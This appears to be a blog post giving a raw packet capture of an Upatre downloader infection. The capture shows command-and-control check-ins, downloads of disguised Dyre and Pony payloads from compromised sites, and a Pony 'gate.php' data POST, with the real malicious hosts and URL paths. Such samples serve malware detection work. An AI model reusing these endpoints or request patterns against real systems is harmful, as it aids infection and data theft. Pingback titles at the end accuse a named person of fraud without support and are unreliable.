E-mail Spam Upatre Trojan Downloader Loads Dyre SSL/443 Trojan and Pony Downloader Malware PCAP Traffic Sample

By | July 1, 2015

2015-01-27 14:21:25.061276 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [S], seq 1519016217, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.G@…_/……#..\;GZ.Y……. ……………..
2015-01-27 14:21:25.559710 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [S.], seq 3577950926, ack 1519016218, win 64240, options [mss 1460], length 0
E..,……….#…..;G.\.C2.Z.Y.`…X}……..
2015-01-27 14:21:25.560035 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [.], ack 1, win 64240, length 0
E..(.H@…_:……#..\;GZ.Y..C2.P…p:……..
2015-01-27 14:21:25.560178 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E….I@…^…….#..\;GZ.Y..C2.P…-…GET /2701uk12/WIN-BS4EUJ1KO34/0/61-SP1/0/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15175
Cache-Control: no-cache
2015-01-27 14:21:25.560261 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [.], ack 133, win 64240, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.074071 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [FP.], seq 1, ack 133, win 64240, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.074471 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [.], ack 2, win 64240, length 0
E..(.J@…_8……#..\;GZ.Y..C2.P…o………
2015-01-27 14:21:26.074847 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [F.], seq 133, ack 2, win 64240, length 0
E..(.K@…_7……#..\;GZ.Y..C2.P…o………
2015-01-27 14:21:26.075108 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [.], ack 134, win 64239, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.075658 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [S], seq 2464773655, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.L@…_*……#..];G..v……. ..”…………..
2015-01-27 14:21:26.827991 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [S.], seq 2325778595, ack 2464773656, win 64240, options [mss 1460], length 0
E..,……….#…..;G.]……v.`………….
2015-01-27 14:21:26.828114 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [.], ack 1, win 64240, length 0
E..(.M@…_5……#..];G..v…..P………….
2015-01-27 14:21:26.828704 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [P.], seq 1:128, ack 1, win 64240, length 127
E….N@…^…….#..];G..v…..P…….GET /2701uk12/WIN-BS4EUJ1KO34/1/0/0/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15175
Cache-Control: no-cache
2015-01-27 14:21:26.828767 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [.], ack 128, win 64240, length 0
E..(……….#…..;G.]……v.P….+……..
2015-01-27 14:21:27.440822 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [R.], seq 1, ack 128, win 64240, length 0
E..(……….#…..;G.]……v.P….’……..
2015-01-27 14:21:27.442418 IP 192.168.221.134.55462 > 192.168.221.2.53: 31595+ A? best-synthetic-motor-oil.com. (46)
E..J.O…..y………..5.6Z.{k………..best-synthetic-motor-oil.com…..
2015-01-27 14:21:27.527315 IP 192.168.221.2.53 > 192.168.221.134.55462: 31595 1/0/0 A 192.163.217.66 (62)
E..Z……………..5…F..{k………..best-synthetic-motor-oil.com………………..B
2015-01-27 14:21:27.528955 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [S], seq 3826675915, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.P@….^…….B.^.P..p……. ..p…………..
2015-01-27 14:21:28.875176 IP 192.163.217.66.80 > 192.168.221.134.49502: Flags [S.], seq 1331588575, ack 3826675916, win 64240, options [mss 1460], length 0
E..,………..B…..P.^O^m…p.`….@……..
2015-01-27 14:21:28.875303 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [.], ack 1, win 64240, length 0
E..(.Q@….i…….B.^.P..p.O^m.P………….
2015-01-27 14:21:28.875474 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147
E….R@…………B.^.P..p.O^m.P… …GET /file_k12.pdf HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: best-synthetic-motor-oil.com
Cache-Control: no-cache

2015-01-27 14:21:32.155348 IP 192.163.217.66.80 > 192.168.221.134.49502: Flags [P.], seq 1:1356, ack 148, win 64240, length 1355
E..s………..B…..P.^O^m…q_P…….HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:21:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 438781
Cache-Control: max-age=290304000, public
Expires: Tue, 27 Jan 2015 18:21:31 GMT
Vary: User-Agent
Content-Type: application/pdf

~ .0…4. .j~
… .&V.sT…h….H+…(vL.>…..x….(….z….j……UN…/.A$…Z…t..6.I+r…-..N……….v?@(.M>.I…”..U…jZ…|Gd..J…….(.O..PH.+d.2z9.K……..`….X..W.c.Vd?.
c……f…..
.8lL.8ct.?..Fh…\. G…..)oz$.}k…..{\….D.y….~P(}.!.. .=.cF.’.Gh..Cy. ..-..T…=…@tL…=.%…8.O…bGH.
….2…Oy.
..s.-io
gh..2.Y..`.
G.N.-ld
Wh.bGx.
…..`.
G.l……….nE….
G.\..n…/Q..1H..io..%…d7..e.HK:..o.U..C..:..HKk.]..’bGx$
.?..Oy&
.7.HSkm….@W..~N.-.@.kC2…o1g…j….
Gh2O…..d0O.8..Gy5
.-…x4O..}….MC(..2\..D-….;.Gh>.3o…h@.Bk…(..2….xD
…O..F1….2…..=2.hJ
..L/..L
.mNO.(.Z……@
G.WZ./B …….O.k.S.`.L……L.@….6……|-.~.;….u……….ha

Gh`….LCC.[..n…..A…D…Og…8./.go…….m.A.h ..wU..8..1..2.(.2.”`E.u.Gh……Vhx…v..nu.?|.._k.[..|.B.;..k.Ms…l.
.D%f.
…./….T…W……l….i\.:u…..Vh.S…C2….-k1……..wh.
…EO….(…p..D-{…]…AS.W;….0$).b..;../.=……g]..*0?.k.0.e..i…Y.\j.D..h.P.h.
Gh+.GXU.Gh.
.E.
.l..G…Iw..Ih…I
F$.+…yGH.x(..k*h.i&..e3H.h”H..)H.
)H.E.H.e…$Je..C..Ecqo…=KBk…..
@j.7….T.:Zvj…a.)

2015-01-27 14:21:42.275270 IP 192.168.221.134.49503 > 202.153.35.133.15128: Flags [.], ack 1, win 64240, length 0
E..(..@…^…….#.._;.w…….P………….
2015-01-27 14:21:42.275614 IP 192.168.221.134.49503 > 202.153.35.133.15128: Flags [P.], seq 1:129, ack 1, win 64240, length 128
E…..@…^…….#.._;.w…….P….e..GET /2701uk12/WIN-BS4EUJ1KO34/41/7/4/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15128
Cache-Control: no-cache
2015-01-27 14:21:42.275623 IP 202.153.35.133.15128 > 192.168.221.134.49503: Flags [.], ack 129, win 64240, length 0
E..(……….#…..;.._….w..oP………….
2015-01-27 14:21:42.699373 IP 202.153.35.133.15128 > 192.168.221.134.49503: Flags [R.], seq 1, ack 129, win 64240, length 0
E..(……….#…..;.._….w..oP………….
2015-01-27 14:21:43.517033 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [R.], seq 148, ack 439032, win 0, length 0
E..(..@…………B.^.P..q_Oe .P….Y……..
2015-01-27 14:21:48.066629 IP 192.168.221.134.54585 > 192.168.221.2.53: 2357+ A? google.com. (28)
E..8……………..9.5.$.n 5………..google.com…..
2015-01-27 14:21:48.113817 IP 192.168.221.2.53 > 192.168.221.134.54585: 2357 6/0/0 A 64.233.181.139, A 64.233.181.101, A 64.233.181.138, A 64.233.181.100, A 64.233.181.102, A 64.233.181.113 (124)
E………………..5.9.. i 5………..google.com……………..@……………@..e…………@……………@..d…………@..f…………@..q
2015-01-27 14:21:48.116867 IP 192.168.221.134.49504 > 64.233.181.139.80: Flags [S], seq 2281313745, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…V6….@….`.P………. .Z……………
2015-01-27 14:21:48.196170 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [S.], seq 3168605148, ack 2281313746, win 64240, options [mss 1460], length 0
E..,…….4@……..P.`……..`….J……..
2015-01-27 14:21:48.196483 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [.], ack 2, win 64239, length 0
E..(…….7@……..P.`……..P………….
2015-01-27 14:21:48.197151 IP 192.168.221.134.53085 > 192.168.221.2.53: 54005+ A? s2.taraba.net. (31)
E..;……………..].5.’7…………..s2.taraba.net…..
2015-01-27 14:21:48.269890 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [FP.], seq 1, ack 2, win 64239, length 0
E..(…….6@……..P.`……..P………….
2015-01-27 14:21:48.270039 IP 192.168.221.134.49504 > 64.233.181.139.80: Flags [.], ack 2, win 64240, length 0
E..(..@…V>….@….`.P……..P………….
2015-01-27 14:21:48.319596 IP 192.168.221.2.53 > 192.168.221.134.53085: 54005 1/0/0 A 208.91.197.54 (47)
E..K……………..5.].7……………s2.taraba.net………………[.6
2015-01-27 14:21:48.320097 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0………….[.6P………..”ZZ………….
2015-01-27 14:21:48.629979 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:21:49.332995 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@….
…..[.6P………..”ZZ………….
2015-01-27 14:21:50.849759 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@…. …..[.6P………..”ZZ………….
2015-01-27 14:21:53.963718 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:21:58.675180 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:22:04.980868 IP 192.168.221.134.63862 > 192.168.221.2.53: 9458+ A? stun2.l.google.com. (36)
E..@……………..v.5.,..$…………stun2.l.google.com…..
2015-01-27 14:22:05.110800 IP 192.168.221.2.53 > 192.168.221.134.63862: 9458 1/0/0 A 173.194.67.127 (52)
E..P……………..5.v.<u.$…………stun2.l.google.com……………….C.
2015-01-27 14:22:05.111455 IP 192.168.221.134.20507 > 173.194.67.127.19302: UDP, length 20
E..0…….V……C.P.Kf……….Z.%…%.I…..
2015-01-27 14:22:05.418524 IP 192.168.221.134.20507 > 173.194.67.127.19302: UDP, length 20
E..0..@…[U……C.P.Kf……….Z.%…%.I…..
2015-01-27 14:22:05.475524 IP 173.194.67.127.19302 > 192.168.221.134.20507: UDP, length 32
E..<…….G..C…..KfP..(h…….Z.%…%.I………….B.C.
2015-01-27 14:22:05.483145 IP 192.168.221.134.59813 > 192.168.221.2.53: 10886+ A? google.com. (28)
E..8……………….5.$..*…………google.com…..
2015-01-27 14:22:05.530146 IP 192.168.221.2.53 > 192.168.221.134.59813: 10886 6/0/0 A 74.125.207.100, A 74.125.207.138, A 74.125.207.102, A 74.125.207.139, A 74.125.207.101, A 74.125.207.113 (124)
E………………..5…..2*…………google.com……………..J}.d…………J}…………..J}.f…………J}…………..J}.e…………J}.q
2015-01-27 14:22:05.532828 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [S], seq 2079037603, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…2…..J}.d.a.P{……… ……………..
2015-01-27 14:22:05.555112 IP 173.194.67.127.19302 > 192.168.221.134.20507: UDP, length 32
E..<…….E..C…..KfP..(h…….Z.%…%.I………….B.C.
2015-01-27 14:22:05.594500 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [S.], seq 3089411234, ack 2079037604, win 64240, options [mss 1460], length 0
E..,……m.J}.d…..P.a.$..{…`………….
2015-01-27 14:22:05.594740 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [.], ack 1, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:05.594875 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:05.594984 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [.], ack 2, win 64239, length 0
E..(……m.J}.d…..P.a.$..{…P………….
2015-01-27 14:22:05.723241 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [FP.], seq 1, ack 2, win 64239, length 0
E..(……m.J}.d…..P.a.$..{…P………….
2015-01-27 14:22:05.723386 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [.], ack 2, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:12.916616 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [S], seq 2368281210, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…W…..[….b…).z…… .Q……………
2015-01-27 14:22:13.186740 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [R.], seq 2401765140, ack 2368281211, win 64240, length 0
E..(……..[……….b.(…).{P…!………
2015-01-27 14:22:13.700811 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [S], seq 2368281210, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…W…..[….b…).z…… .Q……………
2015-01-27 14:22:13.992066 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [S.], seq 430933093, ack 2368281211, win 64240, options [mss 1460], length 0
E..,……..[……….b…e.).{`………….
2015-01-27 14:22:13.992191 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [.], ack 1, win 64240, length 0
E..(. @…X…..[….b…).{…fP….H……..
2015-01-27 14:22:13.993641 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [P.], seq 1:105, ack 1, win 64240, length 104
E….
@…W…..[….b…).{…fP………..c…_..T..V….h…._.&4y..vf…Y..ciA…../.5…
[……….b…f.)..P………….
2015-01-27 14:22:14.313965 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [P.], seq 1:1349, ack 105, win 64240, length 1348
E..l……..[……….b…f.)..P…Gt……Y…U..T..V.8.LY..r.B.&X>6R..p”.W..q.0′ .x.h..y.Z….l……..v^o.+…”8……………………………0…0..l. …~ns…0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0…150127155718Z..160127155718Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0..”0.. *.H………….0..
……………Bh.Jm..D$t..o..NqwT…3Z.+.H.l&$……”P.K.s..{.Ro.>…~,0wk.;\1….K.Q*.N.p.4……C…LQxG.
….+…q.y….9.”@~…. ….~lr@…<../.1……T…………..7J…q…~q..+.rPT…B.J..of……%.R.2W.g.o..yj.$..6p…..E.l…8p3..]…^……..#.P^v……0.. *.H…………….9….pso){…nM..u.
..m..c .!f ~X..=..W…..?…….Y’.Nu.?.{$B8.B.{.r8…..r7…..).L@..Qa…
P.4.b.U…5..<.pm.;.n.^.4(.’…5../.Il.I_[].s.H\-tn……P…………B…w………………s.nT….7.)..”G%h…r….w>….8.’)H….’..V..T.5…[..7…Lc……..K…G…A.]$….N@.5.-…….”…… ……..>t….hxQ……….G…….m…..@..#………..A…..<.
Z.+}.N……..G…….7…. l.X..-..k…v.<..M….YG…..6………..7…….oWK…DF..z”|….3……}.{.W……4…K.|.=.go)…..L…S….Cff=Dk.`..}*…….u..#A.J.S.&.Z..v.tF75..L>w.k…$~..F….x.dW…..Y…1…[#.-G …..-..
2015-01-27 14:22:14.314002 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [P.], seq 1349:1359, ack 105, win 64240, length 10
E..2……..[……….b…..)..P…{n…………
2015-01-27 14:22:14.314140 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [.], ack 1359, win 62882, length 0
2015-01-27 14:22:24.993058 IP 91.222.152.182.443 > 192.168.221.134.49508: Flags [P.], seq 1:1349, ack 137, win 64240, length 1348
E..l.<……[……….d.O./….P………..Y…U..T.._.g_.zta$S
.r….*.*Cm.AA..C. …..up.:\} ?….l.g..R.[Hy..pQA……………………………0…0..l. …~ns…0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0…150127155718Z..160127155718Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0..”0.. *.H………….0..
……………Bh.Jm..D$t..o..NqwT…3Z.+.H.l&$……”P.K.s..{.Ro.>…~,0wk.;\1….K.Q*.N.p.4……C…LQxG.
….+…q.y….9.”@~…. ….~lr@…<../.1……T…………..7J…q…~q..+.rPT…B.J..of……%.R.2W.g.o..yj.$..6p…..E.l…8p3..]…^……..#.P^v……0.. *.H…………….9….pso){…nM..u.
..m..c .!f ~X..=..W…..?…….Y’.Nu.?.{$B8.B.{.r8…..r7…..).L@..Qa…
P.4.b.U…5..<.pm.;.n.^.4(.’…5../.Il.I_[].s.H\-tn……P…………B…w………………s.nT….7.)..”G%h…r….w>….8.’)H….’..V..T.5…[..7…Lc……..K…G…A.zG.?.y{…..m….*.#.(w……P2. Ro[7……YW.$.W…T..
..BnTX……..h/|!V…….q(n.@p..-.8?…z.I.pidp..@.g..3b[>|..)..p.1…..:…f5+..z……Z…..M`..GG..A:Gl…..[.<B.4……9.Y….&%Q.~E._!gm……….S^…iA..s.K…..M..NX…y.Z…}….g…\..@.[>.. .e.0…… x.)`..Yx….ql7..A….P….=.J.c…e.O..^l…$…..
2015-01-27 14:22:27.738737 IP 192.168.221.134.49511 > 78.143.39.41.80: Flags [.], ack 1, win 64240, length 0
E..(.Q@………N.’).g.PI…….P…GZ……..
2015-01-27 14:22:27.738980 IP 192.168.221.134.49511 > 78.143.39.41.80: Flags [P.], seq 1:185, ack 1, win 64240, length 184
E….R@………N.’).g.PI…….P…<…GET /mandoc/ml1from1.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: zac-buero.de
2015-01-27 14:22:27.934161 IP 192.168.221.134.49512 > 91.222.152.182.443: Flags [S], seq 386420347, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.W@…W…..[….h….N{…… ……………..
2015-01-27 14:22:28.038367 IP 78.143.39.41.80 > 192.168.221.134.49511: Flags [P.], seq 1:1368, ack 185, win 64240, length 1367
E….~……N.’)…..P.g….I…P….e..HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:22:43 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 27 Jan 2015 12:05:10 GMT
ETag: “3f6b96-6e540-50da111052980″
Accept-Ranges: bytes
Content-Length: 451904
Content-Type: application/x-tar
2015-01-27 14:22:29.878174 IP 37.59.30.125.443 > 192.168.221.134.49515: Flags [P.], seq 1:970, ack 105, win 64240, length 969
E………>D%;.}…….k
…..3.P………..Y…U..T..g…y..[i..tb…,b..H.t…!6. .h….g.J..y..G.@OYw.>,.P.-b…#……………………………0…0…. ….EL.R.0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….dge0X2vrqrAtNru4iNGtb2F81!0…U.
..XLjz9UG5P7cAyVZGkOB2UW6n1!0…U….kUXskeWSY9DjX8YZNxJQrUWR0…150127104529Z..160122104529Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….dge0X2vrqrAtNru4iNGtb2F81!0…U.
..XLjz9UG5P7cAyVZGkOB2UW6n1!0…U….kUXskeWSY9DjX8YZNxJQrUWR0..0.. *.H…………0…….G+…%.>B…………..K……M.)0..v.#…D……. ..w.$…c….3…FQ..w..$A.1h..K….M.@…lTm……a…..:..{ZH…58LSO..r.u…..0.. *.H…………t…m”.x…c,……..L…..x.1….Y….H.W…………j.Q.6.x.o3….u.t5…k.},…….%..M…..%.Yw.N>….2…i..`\.;..K..{..m…………..A.\…z.9..T..%d.h..7=..N..Z.v..,…….L.;……’..rv.[..yz.ZY.=….l…..q.b.O…..}…>K.R.Sl…fx..P.-…….[k….. ..%..W…#..R.D(..%..8…….c h.r0.Ay.!…w }..6..|J…….t……..o..w………..
2015-01-27 14:22:33.930003 IP 192.168.221.134.53751 > 192.168.221.2.53: 52590+ A? shopmeyermusic.com. (36)
E..@.D……………..5.,\..n………..shopmeyermusic.com…..
2015-01-27 14:22:34.031261 IP 91.222.152.182.443 > 192.168.221.134.49520: Flags [P.], seq 1418:1759, ack 580, win 64240, length 341
E..}.Q…..f[……….p.z._.:..P………..Pp;.V.l…?0……q.”….DI…\[…+…sE.fv.+8….g…R…]k8.4.H.sY<u……….s..]&#…$..MR.u..a\….e…zw.h:+d)……Y.F..$…w……..V…|.=..X/~…>.S..’….~..<…D].G.k..W(……_.i..K%.’…V.]{……I.vQT..-.TU.{..B .Y..).(….E
x…….7-.B.y….+;…….z4,.m.e… …..G..”l.9y…Yl.{….w.#? ..’-..^.^h.)….>.c..x.r.3^ .
2015-01-27 14:22:34.031443 IP 192.168.221.134.49520 > 91.222.152.182.443: Flags [.], ack 1759, win 64240, length 0
E..(.E@…V…..[….p…:…z..P…U………
2015-01-27 14:22:34.057951 IP 192.168.221.2.53 > 192.168.221.134.53751: 52590 1/0/0 A 72.167.2.191 (52)
E..P.R…..p………5…<.o.n………..shopmeyermusic.com……………..H…
2015-01-27 14:22:34.058411 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [S], seq 3306252340, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.F@………H….s.P..h4…… .vw…………..
2015-01-27 14:22:34.072448 IP 37.59.30.125.443 > 192.168.221.134.49522: Flags [S.], seq 159891081, ack 883821133, win 64240, options [mss 1460], length 0
E..,.S….A.%;.}…….r …4.
M`………….
2015-01-27 14:22:34.072520 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [.], ack 1, win 64240, length 0
E..(.G@………%;.}.r..4.
M …P………….
2015-01-27 14:22:34.072955 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [P.], seq 1:137, ack 1, win 64240, length 136
E….H@………%;.}.r..4.
M …P…p…………..T..j…Cyc…5~.t0\\]{}&.q.W{… .h….g.J..y..G.@OYw.>,.P.-b…#…/.5…
….. .
.2.8…………………..
…………..
2015-01-27 14:22:34.072966 IP 37.59.30.125.443 > 192.168.221.134.49522: Flags [.], ack 137, win 64240, length 0
E..(.T….A.%;.}…….r …4.
.P….:……..
2015-01-27 14:22:34.116784 IP 72.167.2.191.80 > 192.168.221.134.49523: Flags [S.], seq 1659163434, ack 3306252341, win 64240, options [mss 1460], length 0
E..,.U….9.H……..P.sb..*..h5`….v……..
2015-01-27 14:22:34.116916 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [.], ack 1, win 64240, length 0
E..(.I@………H….s.P..h5b..+P….3……..
2015-01-27 14:22:34.117083 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [P.], seq 1:185, ack 1, win 64240, length 184
E….J@….8….H….s.P..h5b..+P…{S..GET /boa/pony1.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: shopmeyermusic.com
2015-01-27 14:22:34.180683 IP 72.167.2.191.80 > 192.168.221.134.49523: Flags [P.], seq 1:1356, ack 185, win 64240, length 1355
E..s.W….4.H……..P.sb..+..h.P…….HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:22:34 GMT
Server: Apache
Last-Modified: Tue, 27 Jan 2015 16:20:24 GMT
ETag: “1c140-50da4a1db3c2b”
Accept-Ranges: bytes
Content-Length: 115008
Content-Type: application/x-tar
2015-01-27 14:22:34.966373 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [.], ack 64714, win 64240, length 0
E..(..@….\….%;.}.r..4… ..SP… ………
2015-01-27 14:22:34.967377 IP 192.168.221.134.49525 > 83.219.133.225.81: Flags [P.], seq 1:413, ack 1, win 64240, length 412
E…..@…o…..S….u.Q..Y]L..qP…
…POST /dffgbDFGvf465/gate.php HTTP/1.0
Host: 83.219.133.225
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 199
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
2015-01-27 14:22:35.469024 IP 83.219.133.225.81 > 192.168.221.134.49525: Flags [FP.], seq 1:177, ack 612, win 64240, length 176
E……….lS……..Q.uL..q..[.P….$..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 27 Jan 2015 18:22:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.36-0+deb7u3

…..L…dps.VQ5.C.&2015-01-27 14:22:39.235925 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [.], ack 115236, win 64240, length 0
E..(..@….p….H….s.P..h.b..NP….V……..
2015-01-27 14:22:39.277350 IP 192.168.221.134.56474 > 192.168.221.2.53: 11065+ A? i2p.mooo.com. (30)
E..:……………….5.&..+9………..i2p.mooo.com…..
2015-01-27 14:22:39.278092 IP 192.168.221.134.63043 > 192.168.221.2.53: 44213+ A? i2p.mooo.com. (30)
E..:……………..C.5.&6m………….i2p.mooo.com…..
2015-01-27 14:22:39.336460 IP 192.168.221.2.53 > 192.168.221.134.56474: 11065 1/0/0 A 95.25.71.144 (46)
E..J.?……………5…6./+9………..i2p.mooo.com…………….._.G.
2015-01-27 14:22:39.338263 IP 192.168.221.134.49529 > 95.25.71.144.443: Flags [S], seq 1859497569, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@………_.G..y..n..a…… .)……………
2015-01-27 14:22:39.355342 IP 192.168.221.2.53 > 192.168.221.134.63043: 44213 1/0/0 A 95.25.71.144 (46)
E..J.@……………5.C.6O
………….i2p.mooo.com…………….._.G.

Share Button

3 thoughts on “E-mail Spam Upatre Trojan Downloader Loads Dyre SSL/443 Trojan and Pony Downloader Malware PCAP Traffic Sample

  1. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who abuses those closest to her to achieve her selfish objectives.

  2. Pingback: Joseph de Saram#Rhodium

  3. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *